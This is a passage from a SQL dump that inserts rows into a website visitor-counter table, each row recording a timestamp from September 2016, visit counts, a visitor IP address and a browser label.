9.76.79',''),(62259,1474018481,2,2,0,0,'91.196.178.98','chrome'),(62260,1474018823,1,1,0,0,'91.196.178.67','firefox'),(62261,1474019425,1,1,0,0,'91.196.178.71','firefox'),(62262,1474020001,1,0,1,0,'66.249.76.77',''),(62263,1474020273,3,3,0,0,'83.149.126.98','other'),(62264,1474020349,1,1,0,0,'91.196.178.67','chrome'),(62265,1474022088,1,1,0,0,'91.196.178.165','chrome'),(62266,1474022229,1,1,0,0,'136.243.152.18','other'),(62267,1474023301,1,1,0,0,'194.1.195.225','chrome'),(62268,1474023587,1,1,0,0,'66.102.9.29','chrome'),(62269,1474024793,1,1,0,0,'216.145.5.42','firefox'),(62270,1474024860,1,0,1,0,'66.249.76.45',''),(62271,1474026424,1,0,1,0,'66.249.76.46',''),(62272,1474026733,1,1,0,0,'91.196.178.67','chrome'),(62273,1474026946,2,2,0,0,'192.166.219.136','other'),(62274,1474027246,1,1,0,0,'91.124.182.3','firefox'),(62275,1474027690,1,1,0,0,'94.179.17.197','chrome'),(62276,1474028017,1,1,0,0,'91.196.178.67','firefox'),(62277,1474028072,3,3,0,0,'78.177.12.253','other'),(62278,1474028216,1,0,1,0,'66.249.76.46',''),(62279,1474028484,2,2,0,0,'94.179.65.125','firefox'),(62280,1474029044,1,1,0,0,'66.249.76.46','chrome'),(62281,1474029135,1,1,0,0,'66.249.66.180','chrome'),(62282,1474030093,1,1,0,0,'37.55.166.162','firefox'),(62283,1474030187,1,1,0,0,'46.200.231.119','chrome'),(62284,1474030277,1,1,0,0,'130.193.50.34','other'),(62285,1474030762,1,0,1,0,'66.249.76.46',''),(62286,1474031099,1,1,0,0,'91.196.178.67','firefox'),(62287,1474031785,1,1,0,0,'207.46.13.99','other'),(62288,1474031952,1,1,0,0,'91.196.178.161','chrome'),(62289,1474032275,1,0,1,0,'68.180.230.181',''),(62290,1474032745,1,1,0,0,'91.196.178.165','chrome'),(62291,1474034297,2,1,1,0,'66.249.76.47',''),(62292,1474037122,1,1,0,0,'207.46.13.99','other'),(62293,1474037302,1,1,0,0,'66.102.9.29','chrome'),(62294,1474038310,1,1,0,0,'66.102.9.27','other'),(62295,1474038347,1,1,0,0,'95.135.213.56','other'),(62296,1474038911,1,0,1,0,'66.249.76.45',''),(62297,1474039257,1,0,1,0,'66.249.66.84',''),(62298,1474039722,1,1,0,0,'91.196.178.163','other'),(62299,1474039802,1,1,0,0,'91.124.182.3','firefox'),(62300,1474040310,1,1,0,0,'141.8.183.25','other'),(62301,1474040648,1,1,0,0,'141.8.142.58','other'),(62302,1474040651,4,4,0,0,'130.193.50.34','other'),(62303,1474041265,1,1,0,0,'141.8.142.61','other'),(62304,1474041586,1,1,0,0,'141.8.183.25','other'),(62305,1474041587,1,1,0,0,'141.8.142.67','other'),(62306,1474041768,1,1,0,0,'188.255.24.96','msie'),(62307,1474041906,1,1,0,0,'130.193.50.34','other'),(62308,1474042002,1,1,0,0,'66.102.9.29','other'),(62309,1474042693,1,0,1,0,'66.249.76.45',''),(62310,1474044431,1,0,1,0,'66.249.66.87',''),(62311,1474044651,1,0,1,0,'66.249.66.81',''),(62312,1474045533,1,1,0,0,'66.102.9.27','other'),(62313,1474046118,1,0,1,0,'66.249.76.81',''),(62314,1474046510,1,0,1,0,'66.249.76.47',''),(62315,1474048198,1,0,1,0,'66.249.76.45',''),(62316,1474048579,1,1,0,0,'195.43.70.132','chrome'),(62317,1474048828,1,1,0,0,'91.196.178.36','chrome'),(62318,1474049112,1,1,0,0,'66.102.9.27','other'),(62319,1474049436,1,1,0,0,'82.145.221.55','other'),(62320,1474051189,1,1,0,0,'91.196.178.71','chrome'),(62321,1474051954,1,1,0,0,'217.69.133.229','other'),(62322,1474052294,1,0,1,0,'66.249.76.45',''),(62323,1474052714,1,1,0,0,'66.102.9.29','other'),(62324,1474053657,1,0,1,0,'66.249.76.45',''),(62325,1474053769,1,1,0,0,'66.249.66.81','chrome'),(62326,1474054049,1,1,0,0,'46.4.120.3','other'),(62327,1474054316,1,0,1,0,'66.249.76.46',''),(62328,1474055301,1,1,0,0,'94.154.239.69','other'),(62329,1474056315,1,1,0,0,'82.145.221.236','other'),(62330,1474056334,1,1,0,0,'66.102.9.27','other'),(62331,1474057018,2,2,0,0,'130.193.50.34','other'),(62332,1474058585,1,1,0,0,'130.193.50.34','other'),(62333,1474059885,1,0,1,0,'68.180.230.236',''),(62334,1474059917,1,1,0,0,'66.102.9.27','other'),(62335,1474061857,1,0,1,0,'66.249.76.45',''),(62336,1474062986,1,0,1,0,'68.180.230.236',''),(62337,1474063512,1,1,0,0,'66.102.9.27','other'),(62338,1474063671,1,0,1,0,'66.249.76.46',''),(62339,1474066033,1,1,0,0,'66.249.76.46','chrome'),(62340,1474066611,1,1,0,0,'180.76.15.15','other'),(62341,1474067124,1,1,0,0,'66.102.9.29','other'),(62342,1474068374,1,1,0,0,'130.193.50.34','other'),(62343,1474069624,1,1,0,0,'66.249.66.87','chrome'),(62344,1474069777,1,1,0,0,'130.193.50.34','other'),(62345,1474070305,1,0,1,0,'66.249.76.47',''),(62346,1474070710,1,1,0,0,'66.102.9.27','other'),(62347,1474071905,1,0,1,0,'66.249.76.81',''),(62348,1474071909,1,0,1,0,'66.249.66.87',''),(62349,1474072890,1,1,0,0,'207.46.13.99','other'),(62350,1474072935,1,1,0,0,'207.46.13.60','other'),(62351,1474072940,2,2,0,0,'40.77.167.91','other'),(62352,1474073119,1,0,1,0,'66.249.76.45',''),(62353,1474073244,1,1,0,0,'157.55.39.110','other'),(62354,1474073668,1,1,0,0,'130.193.50.34','other'),(62355,1474074329,1,1,0,0,'66.102.9.29','other'),(62356,1474074562,1,1,0,0,'217.69.133.231','other'),(62357,1474075002,2,2,0,0,'174.129.237.157','other'),(62358,1474075140,1,1,0,0,'130.193.50.34','other'),(62359,1474075626,1,1,0,0,'157.55.39.26','other'),(62360,1474076054,1,0,1,0,'66.249.66.84',''),(62361,1474076202,1,1,0,0,'66.249.76.45','chrome'),(62362,1474077897,1,1,0,0,'157.55.39.26','other'),(62363,1474078917,1,1,0,0,'66.102.9.29','other'),(62364,1474081444,1,1,0,0,'130.193.50.34','other'),(62365,1474081530,1,1,0,0,'66.102.9.25','other'),(62366,1474083164,2,0,2,0,'66.249.76.45',''),(62367,1474083166,14,0,14,0,'66.249.76.77',''),(62369,1474083186,1,0,1,0,'66.249.76.79',''),(62370,1474083200,4,0,4,0,'66.249.66.177',''),(62371,1474083203,1,0,1,0,'66.249.66.84',''),(62372,1474085110,1,1,0,0,'66.102.9.29','other'),(62373,1474085459,1,1,0,0,'66.102.9.27','chrome'),(62374,1474086669,1,0,1,0,'66.249.76.79',''),(62375,1474087077,1,1,0,0,'91.196.178.38','chrome'),(62376,1474088409,1,1,0,0,'141.0.12.197','opera'),(62377,1474088720,1,1,0,0,'66.102.9.27','other'),(62378,1474090470,1,1,0,0,'5.9.62.130','other'),(62379,1474092086,2,2,0,0,'173.234.159.250','other'),(62380,1474092316,1,1,0,0,'66.102.9.29','other'),(62381,1474092579,1,1,0,0,'78.25.57.189','chrome'),(62382,1474092928,1,1,0,0,'157.55.39.187','other'),(62383,1474093117,2,0,2,0,'66.249.76.45',''),(62384,1474093247,1,0,1,0,'66.249.76.47',''),(62385,1474094243,4,4,0,0,'69.30.221.242','other'),(62386,1474095132,1,0,1,0,'66.249.66.87',''),(62387,1474095599,1,1,0,0,'66.249.93.13','chrome'),(62388,1474095884,1,1,0,0,'91.124.182.3','firefox'),(62389,1474095926,1,1,0,0,'66.102.9.29','other'),(62390,1474096297,1,1,0,0,'141.0.12.72','opera'),(62391,1474096593,1,0,1,0,'66.249.76.77',''),(62392,1474096665,1,0,1,0,'66.249.76.81',''),(62393,1474099228,1,1,0,0,'157.55.39.46','other'),(62394,1474099562,1,1,0,0,'66.102.9.25','other'),(62395,1474099660,1,0,1,0,'66.249.76.47',''),(62396,1474100562,1,0,1,0,'66.249.76.47',''),(62397,1474101118,1,1,0,0,'37.53.231.96','chrome'),(62398,1474103090,2,0,2,0,'66.249.76.77',''),(62399,1474103110,1,1,0,0,'66.102.9.27','other'),(62400,1474103967,1,0,1,0,'66.249.76.46',''),(62401,1474104068,1,0,1,0,'66.249.76.45',''),(62402,1474104126,1,1,0,0,'66.249.76.46','chrome'),(62403,1474104158,1,1,0,0,'66.249.76.81','chrome'),(62404,1474105962,2,2,0,0,'88.198.230.79','other'),(62405,1474106515,1,0,1,0,'66.249.66.177',''),(62406,1474106742,1,1,0,0,'66.102.9.29','other'),(62407,1474106948,1,0,1,0,'66.249.76.81',''),(62408,1474109725,1,1,0,0,'91.124.239.74','chrome'),(62409,1474110344,1,1,0,0,'66.102.9.29','other'),(62410,1474111338,1,1,0,0,'180.76.15.141','other'),(62411,1474113581,1,0,1,0,'66.249.66.87',''),(62412,1474113946,1,1,0,0,'66.102.9.29','other'),(62413,1474115613,1,0,1,0,'68.180.230.236',''),(62414,1474117611,1,1,0,0,'66.102.9.25','other'),(62415,1474121174,1,1,0,0,'66.102.9.25','other'),(62416,1474121826,1,1,0,0,'91.196.178.163','chrome'),(62417,1474124092,1,1,0,0,'91.124.182.3','firefox'),(62418,1474124753,1,1,0,0,'66.102.9.25','other'),(62419,1474125351,1,1,0,0,'157.55.39.222','other'),(62420,1474125708,1,1,0,0,'157.55.39.187','other'),(62421,1474126338,1,0,1,0,'66.249.66.84',''),(62422,1474126384,1,1,0,0,'217.69.133.231','other'),(62423,1474126522,1,1,0,0,'157.55.39.46','other'),(62424,1474127806,1,1,0,0,'157.55.39.144','other'),(62425,1474127839,1,0,1,0,'66.249.76.79',''),(62426,1474128352,1,1,0,0,'66.102.9.29','other'),(62427,1474129138,1,1,0,0,'66.102.9.29','chrome'),(62428,1474131253,1,1,0,0,'180.76.15.145','other'),(62429,1474131956,1,1,0,0,'66.102.9.27','other'),(62430,1474132258,1,0,1,0,'66.249.76.47',''),(62431,1474132769,1,1,0,0,'94.179.56.44','chrome'),(62432,1474133380,1,1,0,0,'40.77.167.8','other'),(62433,1474133453,1,1,0,0,'95.133.193.35','chrome'),(62434,1474133480,1,1,0,0,'130.193.51.19','other'),(62435,1474133776,1,1,0,0,'157.55.39.180','other'),(62436,1474133957,1,1,0,0,'180.76.15.6','other'),(62437,1474135561,1,1,0,0,'66.102.9.25','other'),(62438,1474136630,1,1,0,0,'46.211.7.48','other'),(62439,1474138301,1,1,0,0,'40.77.167.8','other'),(62440,1474139056,1,1,0,0,'82.145.223.106','opera'),(62441,1474139110,1,1,0,0,'66.102.9.27','other'),(62442,1474142760,1,1,0,0,'66.102.9.27','other'),(62443,1474144995,1,0,1,0,'66.249.76.77',''),(62444,1474146026,1,0,1,0,'66.249.76.47',''),(62445,1474146346,1,0,1,0,'66.249.76.45',''),(62446,1474146363,1,1,0,0,'66.102.9.25','other'),(62447,1474149188,1,0,1,0,'66.249.76.46',''),(62448,1474149198,1,0,1,0,'66.249.76.77',''),(62449,1474149439,1,0,1,0,'66.249.76.47',''),(62450,1474150025,1,1,0,0,'66.102.9.27','other'),(62451,1474150127,1,0,1,0,'66.249.76.45',''),(62452,1474150799,1,0,1,0,'66.249.76.46',''),(62453,1474151217,1,1,0,0,'91.196.178.69','firefox'),(62454,1474151391,1,0,1,0,'66.249.66.81',''),(62455,1474151393,2,0,2,0,'66.249.66.87',''),(62456,1474153260,1,0,1,0,'66.249.76.46',''),(62457,1474153627,1,1,0,0,'66.102.9.25','other'),(62458,1474154711,1,1,0,0,'141.8.183.25','other'),(62459,1474154727,1,0,1,0,'66.249.76.81',''),(62460,1474155041,1,1,0,0,'64.62.210.39','chrome'),(62461,1474155820,1,0,1,0,'66.249.76.46',''),(62462,1474157110,1,1,0,0,'66.102.9.29','other'),(62463,1474157324,14,14,0,0,'62.210.148.247','other'),(62464,1474157791,2,1,1,0,'66.249.66.84',''),(62465,1474158120,1,1,0,0,'157.55.39.222','other'),(62466,1474159245,1,0,1,0,'66.249.76.81',''),(62467,1474160238,2,0,2,0,'66.249.76.47',''),(62468,1474160495,1,0,1,0,'66.249.76.45',''),(62469,1474160769,1,1,0,0,'66.102.9.29','other'),(62470,1474161232,1,0,1,0,'66.249.66.87',''),(62471,1474163884,1,0,1,0,'66.249.66.87',''),(62472,1474164367,1,1,0,0,'66.102.9.27','other'),(62473,1474164950,1,0,1,0,'66.249.76.45',''),(62474,1474166511,1,0,1,0,'66.249.76.46',''),(62475,1474167137,1,1,0,0,'157.55.39.187','other'),(62476,1474167515,1,0,1,0,'66.249.66.81',''),(62477,1474167861,1,0,1,0,'66.249.66.84',''),(62478,1474168019,1,0,1,0,'66.249.66.87',''),(62479,1474168137,1,1,0,0,'66.102.9.27','other'),(62480,1474168876,1,1,0,0,'141.8.183.19','other'),(62481,1474169000,1,1,0,0,'176.14.200.190','msie'),(62482,1474169539,1,0,1,0,'66.249.76.45',''),(62483,1474169543,1,1,0,0,'109.63.209.176','msie'),(62484,1474169853,1,0,1,0,'66.249.76.47',''),(62485,1474170020,1,0,1,0,'68.180.230.181',''),(62486,1474172008,1,0,1,0,'66.249.66.177',''),(62487,1474172034,2,0,2,0,'66.249.76.45',''),(62488,1474172268,1,1,0,0,'141.8.183.25','other'),(62489,1474172677,1,1,0,0,'180.76.15.145','other'),(62490,1474173469,2,0,2,0,'66.249.76.45',''),(62491,1474173758,1,0,1,0,'66.249.76.47',''),(62492,1474175376,1,0,1,0,'66.249.76.46',''),(62493,1474175935,1,0,1,0,'66.249.76.79',''),(62494,1474176979,2,2,0,0,'138.201.127.112','other'),(62495,1474177064,1,1,0,0,'66.102.9.27','chrome'),(62496,1474178759,1,1,0,0,'66.249.76.46','chrome'),(62497,1474178803,1,1,0,0,'66.249.76.81','chrome'),(62498,1474180583,1,1,0,0,'157.55.39.222','other'),(62499,1474180946,1,0,1,0,'66.249.66.183',''),(62500,1474181203,1,0,1,0,'66.249.76.45',''),(62501,1474182452,1,0,1,0,'66.249.76.79',''),(62502,1474182920,1,0,1,0,'66.249.66.81',''),(62503,1474182927,1,0,1,0,'66.249.76.46',''),(62504,1474183106,1,0,1,0,'66.249.76.47',''),(62505,1474184906,1,1,0,0,'157.55.39.28','other'),(62506,1474185673,1,0,1,0,'66.249.76.46',''),(62507,1474185733,1,1,0,0,'180.76.15.7','other'),(62508,1474185928,1,1,0,0,'94.179.88.158','firefox'),(62509,1474186257,1,0,1,0,'66.249.66.81',''),(62510,1474186311,1,0,1,0,'66.249.76.47',''),(62511,1474187472,1,0,1,0,'66.249.76.45',''),(62512,1474188156,1,1,0,0,'69.30.198.242','other'),(62513,1474188835,1,0,1,0,'68.180.230.236',''),(62514,1474189234,1,0,1,0,'66.249.76.47',''),(62515,1474190172,1,0,1,0,'66.249.76.45',''),(62516,1474190940,1,1,0,0,'95.221.202.183','chrome'),(62517,1474190941,1,1,0,0,'93.80.233.10','msie'),(62518,1474190942,1,1,0,0,'95.28.59.25','msie'),(62519,1474191556,1,0,1,0,'66.249.66.81',''),(62520,1474192439,1,0,1,0,'66.249.76.45',''),(62521,1474192941,1,1,0,0,'157.55.39.222','other'),(62522,1474194273,1,0,1,0,'66.249.76.47',''),(62523,1474195645,2,2,0,0,'179.158.80.115','other'),(62524,1474195845,1,1,0,0,'157.55.39.187','other'),(62525,1474196025,1,0,1,0,'66.249.66.81',''),(62526,1474196801,1,1,0,0,'66.102.9.29','other'),(62527,1474197478,1,0,1,0,'66.249.76.47',''),(62528,1474199562,2,0,2,0,'66.249.76.45',''),(62529,1474199830,1,0,1,0,'66.249.76.47',''),(62530,1474200352,1,1,0,0,'66.249.93.13','chrome'),(62531,1474200442,1,1,0,0,'66.102.9.29','other'),(62532,1474202931,1,1,0,0,'95.132.89.76','chrome'),(62533,1474202992,1,0,1,0,'66.249.76.47',''),(62534,1474203951,1,1,0,0,'66.102.9.27','other'),(62535,1474204098,1,0,1,0,'66.249.76.46',''),(62536,1474204127,1,1,0,0,'95.132.89.76','chrome'),(62537,1474205026,1,1,0,0,'62.210.143.245','other'),(62538,1474205731,1,0,1,0,'66.249.76.47',''),(62539,1474206036,1,0,1,0,'66.249.76.46',''),(62540,1474206272,1,0,1,0,'66.249.66.81',''),(62541,1474207631,1,1,0,0,'66.102.9.29','other'),(62542,1474208183,1,1,0,0,'148.251.190.162','other'),(62543,1474208302,1,0,1,0,'66.249.66.81',''),(62544,1474209844,1,1,0,0,'37.145.111.99','other'),(62545,1474210364,1,0,1,0,'66.249.66.87',''),(62546,1474210869,1,1,0,0,'157.55.39.222','other'),(62547,1474211164,1,1,0,0,'66.102.9.27','other'),(62548,1474211421,1,0,1,0,'66.249.76.45',''),(62549,1474212427,1,1,0,0,'178.219.87.70','chrome'),(62550,1474212993,1,1,0,0,'91.124.182.3','firefox'),(62551,1474213244,2,0,2,0,'66.249.76.45',''),(62552,1474213786,1,0,1,0,'66.249.66.81',''),(62553,1474213822,1,0,1,0,'66.249.66.87',''),(62554,1474213947,1,0,1,0,'66.249.76.46',''),(62555,1474214768,1,1,0,0,'66.102.9.27','other'),(62556,1474214854,1,1,0,0,'5.255.250.41','other'),(62557,1474215192,2,0,2,0,'66.249.66.81',''),(62558,1474215660,1,1,0,0,'157.55.39.222','other'),(62559,1474216595,1,1,0,0,'141.8.183.25','other'),(62560,1474216989,1,0,1,0,'66.249.76.45',''),(62561,1474217006,1,1,0,0,'130.193.50.34','other'),(62562,1474218349,1,1,0,0,'66.102.9.27','other'),(62563,1474218999,1,0,1,0,'66.249.66.81',''),(62564,1474220425,1,0,1,0,'66.249.76.47',''),(62565,1474220733,1,0,1,0,'66.249.66.87',''),(62566,1474221602,1,0,1,0,'66.249.76.77',''),(62567,1474221953,1,1,0,0,'66.102.9.29','other'),(62568,1474222643,1,0,1,0,'66.249.76.45',''),(62569,1474223386,1,0,1,0,'66.249.76.46',''),(62570,1474225047,1,0,1,0,'66.249.76.45',''),(62571,1474225357,1,0,1,0,'66.249.66.183',''),(62572,1474225509,1,1,0,0,'66.102.9.29','other'),(62573,1474226339,1,0,1,0,'66.249.76.46',''),(62574,1474226399,1,0,1,0,'66.249.66.183',''),(62575,1474228161,1,1,0,0,'207.46.13.25','other'),(62576,1474228440,2,0,2,0,'66.249.76.45',''),(62577,1474228862,1,1,0,0,'130.193.50.34','other'),(62578,1474229110,1,1,0,0,'66.102.9.29','other'),(62579,1474229454,1,1,0,0,'207.46.13.25','other'),(62580,1474230939,1,0,1,0,'66.249.76.47',''),(62581,1474231255,2,2,0,0,'40.77.167.13','other'),(62582,1474232788,1,1,0,0,'66.102.9.29','other'),(62583,1474233572,1,0,1,0,'66.249.76.46',''),(62584,1474234445,1,1,0,0,'178.93.150.0','chrome'),(62585,1474234621,1,1,0,0,'207.46.13.158','other'),(62586,1474235131,2,0,2,0,'66.249.76.45',''),(62587,1474235663,1,0,1,0,'66.249.76.46',''),(62588,1474235737,1,0,1,0,'66.249.76.47',''),(62589,1474236430,1,1,0,0,'213.223.171.232','firefox'),(62590,1474236540,1,1,0,0,'66.102.9.25','other'),(62591,1474238703,1,1,0,0,'40.77.167.13','other'),(62592,1474239257,1,0,1,0,'66.249.66.84',''),(62593,1474239420,1,1,0,0,'213.223.171.232','firefox'),(62594,1474240035,1,1,0,0,'66.102.9.27','other'),(62595,1474240044,1,1,0,0,'180.76.15.18','other'),(62596,1474240387,1,0,1,0,'66.249.76.46',''),(62597,1474242098,1,0,1,0,'66.249.76.45',''),(62598,1474242647,1,0,1,0,'66.249.76.47',''),(62599,1474243234,1,0,1,0,'66.249.66.87',''),(62600,1474243509,1,1,0,0,'66.102.9.29','other'),(62601,1474243988,1,0,1,0,'66.249.76.47',''),(62602,1474244272,1,1,0,0,'213.223.171.232','firefox'),(62603,1474244467,2,0,2,0,'66.249.66.87',''),(62604,1474245892,1,0,1,0,'66.249.76.45',''),(62605,1474247065,2,0,2,0,'66.249.76.47',''),(62606,1474247110,1,1,0,0,'66.102.9.29','other'),(62607,1474247332,1,0,1,0,'66.249.76.81',''),(62608,1474247750,1,0,1,0,'66.249.76.46',''),(62609,1474250256,1,0,1,0,'66.249.66.87',''),(62610,1474250710,1,1,0,0,'66.102.9.25','other'),(62611,1474252175,3,3,0,0,'213.223.171.232','other'),(62612,1474252186,1,0,1,0,'66.249.76.46',''),(62613,1474253185,1,1,0,0,'157.55.39.222','other'),(62614,1474253906,1,0,1,0,'66.249.66.87',''),(62615,1474254152,1,1,0,0,'66.102.9.29','chrome'),(62616,1474254310,1,1,0,0,'66.102.9.27','other'),(62617,1474255402,2,0,2,0,'68.180.229.34',''),(62618,1474255490,1,0,1,0,'66.249.66.84',''),(62619,1474255493,2,0,2,0,'66.249.76.46',''),(62620,1474257817,1,0,1,0,'66.249.76.45',''),(62621,1474257910,1,1,0,0,'66.102.9.25','other'),(62622,1474257949,1,0,1,0,'66.249.76.79',''),(62623,1474259502,1,0,1,0,'66.249.76.46',''),(62624,1474261516,1,1,0,0,'66.102.9.29','other'),(62625,1474261619,1,0,1,0,'66.249.76.45',''),(62626,1474261626,1,0,1,0,'66.249.66.84',''),(62627,1474261957,1,1,0,0,'91.196.178.70','firefox'),(62628,1474262329,1,0,1,0,'68.180.229.34',''),(62629,1474262657,1,0,1,0,'66.249.66.81',''),(62630,1474263281,1,1,0,0,'91.196.178.134','chrome'),(62631,1474263350,1,1,0,0,'207.46.13.25','other'),(62632,1474263391,1,0,1,0,'68.180.229.34',''),(62633,1474263922,1,0,1,0,'66.249.76.47',''),(62634,1474263924,1,0,1,0,'66.249.66.183',''),(62635,1474264545,1,0,1,0,'66.249.76.45',''),(62636,1474265289,1,1,0,0,'66.102.9.29','other'),(62637,1474265493,1,0,1,0,'66.249.66.84',''),(62638,1474266407,1,0,1,0,'66.249.76.81',''),(62639,1474267985,1,1,0,0,'46.201.241.5','chrome'),(62640,1474269308,1,1,0,0,'66.249.66.87','chrome'),(62641,1474269377,2,0,2,0,'66.249.76.45',''),(62642,1474269507,1,1,0,0,'66.249.66.180','chrome'),(62643,1474270815,2,2,0,0,'80.91.162.98','other'),(62644,1474271536,1,1,0,0,'91.196.178.72','firefox'),(62645,1474272584,1,1,0,0,'193.107.108.161','msie'),(62646,1474273134,1,1,0,0,'40.77.167.13','other'),(62647,1474273265,1,0,1,0,'66.249.76.47',''),(62648,1474273408,2,2,0,0,'91.196.178.72','chrome'),(62649,1474273845,1,1,0,0,'91.196.178.38','firefox'),(62650,1474273982,1,0,1,0,'66.249.76.46',''),(62651,1474274035,1,1,0,0,'207.46.13.25','other'),(62652,1474276586,1,1,0,0,'164.132.161.38','other'),(62653,1474276669,1,1,0,0,'51.255.65.77','other'),(62654,1474276771,1,1,0,0,'91.192.132.242','chrome'),(62655,1474276808,1,1,0,0,'91.196.178.36','chrome'),(62656,1474277074,1,1,0,0,'82.207.35.20','chrome'),(62657,1474277200,1,0,1,0,'68.180.230.236',''),(62658,1474277319,1,0,1,0,'66.249.76.46',''),(62659,1474277425,1,1,0,0,'163.172.65.197','other'),(62660,1474277709,1,1,0,0,'51.255.65.10','other'),(62661,1474277969,1,1,0,0,'78.111.185.92','chrome'),(62662,1474278384,1,0,1,0,'66.249.76.45',''),(62663,1474278448,1,0,1,0,'66.249.76.47',''),(62664,1474278505,1,1,0,0,'164.132.161.45','other'),(62665,1474278618,1,1,0,0,'163.172.65.194','other'),(62666,1474278646,1,1,0,0,'91.196.178.72','firefox'),(62667,1474278903,1,1,0,0,'51.255.65.57','other'),(62668,1474279207,1,0,1,0,'66.249.76.77',''),(62669,1474279362,1,0,1,0,'66.249.76.47',''),(62670,1474279549,1,1,0,0,'40.77.167.13','other'),(62671,1474279736,1,1,0,0,'66.102.9.27','other'),(62672,1474279820,1,1,0,0,'163.172.66.61','other'),(62673,1474280136,1,1,0,0,'51.255.65.97','other'),(62674,1474280223,1,1,0,0,'51.255.65.83','other'),(62675,1474280460,1,1,0,0,'51.255.65.47','other'),(62676,1474280680,1,1,0,0,'51.255.65.60','other'),(62677,1474280939,1,1,0,0,'78.111.187.39','firefox'),(62678,1474281175,1,1,0,0,'91.196.178.70','firefox'),(62679,1474281684,1,1,0,0,'163.172.66.111','other'),(62680,1474281766,2,0,2,0,'66.249.76.46',''),(62681,1474282277,1,1,0,0,'37.53.144.58','firefox'),(62682,1474282615,1,1,0,0,'51.255.65.43','other'),(62683,1474282682,1,1,0,0,'40.77.167.13','other'),(62684,1474283142,1,1,0,0,'66.102.9.25','other'),(62685,1474283388,1,1,0,0,'91.196.178.99','chrome'),(62686,1474283639,1,1,0,0,'164.132.161.24','other'),(62687,1474283769,1,1,0,0,'164.132.161.2','other'),(62688,1474284148,1,1,0,0,'91.196.178.72','firefox'),(62689,1474284464,1,1,0,0,'91.196.177.94','chrome'),(62690,1474284681,1,1,0,0,'40.77.167.13','other'),(62691,1474285341,1,1,0,0,'213.108.45.162','opera'),(62692,1474285377,1,1,0,0,'163.172.64.178','other'),(62693,1474285439,1,0,1,0,'66.249.76.81',''),(62694,1474285674,1,1,0,0,'185.26.180.166','chrome'),(62695,1474285676,1,1,0,0,'91.196.178.71','firefox'),(62696,1474286279,1,1,0,0,'207.46.13.25','other'),(62697,1474286579,1,1,0,0,'185.26.180.166','chrome'),(62698,1474286709,1,1,0,0,'66.102.9.27','other'),(62699,1474287120,1,1,0,0,'40.77.167.13','other'),(62700,1474287218,1,1,0,0,'91.196.177.94','chrome'),(62701,1474287272,1,1,0,0,'91.196.178.71','firefox'),(62702,1474287284,1,1,0,0,'91.196.178.72','chrome'),(62703,1474287422,1,1,0,0,'164.132.161.76','other'),(62704,1474288098,1,1,0,0,'95.132.2.166','chrome'),(62705,1474288743,1,1,0,0,'164.132.161.86','other'),(62706,1474288809,1,1,0,0,'51.255.65.63','other'),(62707,1474288892,1,0,1,0,'66.249.76.45',''),(62708,1474289017,1,0,1,0,'68.180.229.34',''),(62709,1474289101,1,1,0,0,'62.121.77.90','firefox'),(62710,1474289653,1,0,1,0,'66.249.66.180',''),(62711,1474289947,1,1,0,0,'164.132.161.54','other'),(62712,1474290370,1,1,0,0,'95.132.2.166','chrome'),(62713,1474290386,1,1,0,0,'66.102.9.27','other'),(62714,1474290606,1,1,0,0,'163.172.65.30','other'),(62715,1474290684,1,1,0,0,'37.53.144.58','firefox'),(62716,1474290821,1,0,1,0,'66.249.76.47',''),(62717,1474290832,1,1,0,0,'180.76.15.13','other'),(62718,1474291715,1,0,1,0,'66.249.76.46',''),(62719,1474292084,1,0,1,0,'66.249.76.79',''),(62720,1474292288,1,1,0,0,'91.240.48.46','chrome'),(62721,1474292378,1,1,0,0,'91.196.178.72','firefox'),(62722,1474292466,1,1,0,0,'62.244.20.146','firefox'),(62723,1474292805,1,1,0,0,'163.172.65.124','other'),(62724,1474293079,1,1,0,0,'46.133.70.99','chrome'),(62725,1474293306,1,1,0,0,'51.255.65.60','other'),(62726,1474293548,1,1,0,0,'174.129.237.157','other'),(62727,1474293957,1,1,0,0,'66.102.9.29','other'),(62728,1474293959,1,1,0,0,'164.132.161.3','other'),(62729,1474294096,1,1,0,0,'163.172.65.221','other'),(62730,1474294851,1,1,0,0,'180.76.15.149','other'),(62731,1474295165,1,1,0,0,'94.179.47.7','firefox'),(62732,1474295486,1,0,1,0,'66.249.66.81',''),(62733,1474295621,1,1,0,0,'40.77.167.13','other'),(62734,1474295816,2,0,2,0,'66.249.76.46',''),(62735,1474296338,2,0,2,0,'66.249.76.81',''),(62736,1474296570,1,1,0,0,'180.76.15.155','other'),(62737,1474296589,1,1,0,0,'164.132.161.44','other'),(62738,1474296593,2,2,0,0,'51.254.131.242','other'),(62739,1474296743,1,0,1,0,'66.249.66.177',''),(62740,1474297123,1,1,0,0,'185.26.180.197','other'),(62741,1474297509,1,1,0,0,'66.102.9.25','other'),(62742,1474297829,1,0,1,0,'66.249.66.81',''),(62743,1474297950,1,0,1,0,'66.249.76.45',''),(62744,1474298163,1,0,1,0,'66.249.76.81',''),(62745,1474298201,1,1,0,0,'51.255.65.73','other'),(62746,1474298547,1,1,0,0,'51.255.65.82','other'),(62747,1474298833,1,1,0,0,'164.132.161.8','other'),(62748,1474299266,1,1,0,0,'207.46.13.25','other'),(62749,1474299920,1,1,0,0,'164.132.161.80','other'),(62750,1474299955,1,1,0,0,'51.255.65.45','other'),(62751,1474300088,2,2,0,0,'5.9.111.70','other'),(62752,1474300205,1,1,0,0,'94.179.23.76','chrome'),(62753,1474300773,1,1,0,0,'40.77.167.13','other'),(62754,1474300936,1,1,0,0,'176.36.156.190','other'),(62755,1474301857,1,1,0,0,'164.132.161.69','other');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (62756,1474301967,1,1,0,0,'163.172.66.119','other'),(62757,1474302182,1,1,0,0,'91.196.178.70','firefox'),(62758,1474302723,2,0,2,0,'66.249.76.45',''),(62759,1474303523,1,0,1,0,'66.249.76.47',''),(62760,1474303555,1,1,0,0,'164.132.161.35','other'),(62761,1474303618,1,1,0,0,'91.124.182.3','firefox'),(62762,1474303772,1,1,0,0,'163.172.66.59','other'),(62763,1474303789,1,1,0,0,'164.132.161.75','other'),(62764,1474304096,1,1,0,0,'163.172.64.235','other'),(62765,1474304173,1,0,1,0,'66.249.76.81',''),(62766,1474304188,1,0,1,0,'66.249.76.45',''),(62767,1474304195,1,1,0,0,'163.172.65.122','other'),(62768,1474304890,1,0,1,0,'66.249.66.81',''),(62769,1474306780,1,1,0,0,'51.255.65.57','other'),(62770,1474307121,1,1,0,0,'91.124.182.3','firefox'),(62771,1474307636,1,1,0,0,'82.145.222.232','other'),(62772,1474307654,1,1,0,0,'51.255.65.80','other'),(62773,1474307937,1,1,0,0,'51.255.65.77','other'),(62774,1474308060,1,0,1,0,'66.249.66.84',''),(62775,1474308649,1,0,1,0